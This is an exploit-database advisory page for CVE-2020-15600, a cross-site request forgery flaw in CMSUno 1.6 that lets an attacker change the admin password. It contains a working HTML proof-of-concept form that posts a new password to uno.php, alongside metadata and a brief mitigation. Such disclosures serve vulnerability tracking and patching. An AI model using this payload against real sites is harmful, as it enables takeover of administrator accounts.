CMSUno 1.6 - Cross-Site Request Forgery (Change Admin Password)

vendor:

CMSUno

by:

Noth

7.8

CVSS

HIGH

Cross-Site Request Forgery

352

CWE

Product Name: CMSUno

Affected Version From: v1.6

Affected Version To: v1.6.1

Patch Exists: YES

Related CWE: 2020-15600

CPE: a:boiteasite:cmsuno

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: None

2020

CMSUno 1.6 – Cross-Site Request Forgery (Change Admin Password)

An issue was discovered in CMSUno before 1.6.1. uno.php allows CSRF to change the admin password. The PoC code provided allows an attacker to submit a request to the uno.php page with a new admin password.

Mitigation:

Ensure that all requests are validated and authenticated before being processed.

Source

Exploit-DB raw data:

# Exploit Title: CMSUno 1.6 - Cross-Site Request Forgery (Change Admin Password)
# Date: 2020-05-31
# Exploit Author: Noth
# Vendor Homepage: https://github.com/boiteasite/cmsuno
# Software Link: https://github.com/boiteasite/cmsuno
# Version: v1.6
# CVE : 2020-15600

An issue was discovered in CMSUno before 1.6.1. uno.php allows CSRF to change the admin password.

PoC : 

<html>
<body>
<script>history.pushState(",",'/')</script>
<form action=“http://127.0.0.1/cmsuno-master/uno.php”method=“POST”>
<input type=“hidden” name=“user” value=“admin”/>
<input type=“hidden” name=“pass” value=“yourpassword”/>
<input type=“submit” name=“user” value=“Submit request”/>
</form>
</body>
</html>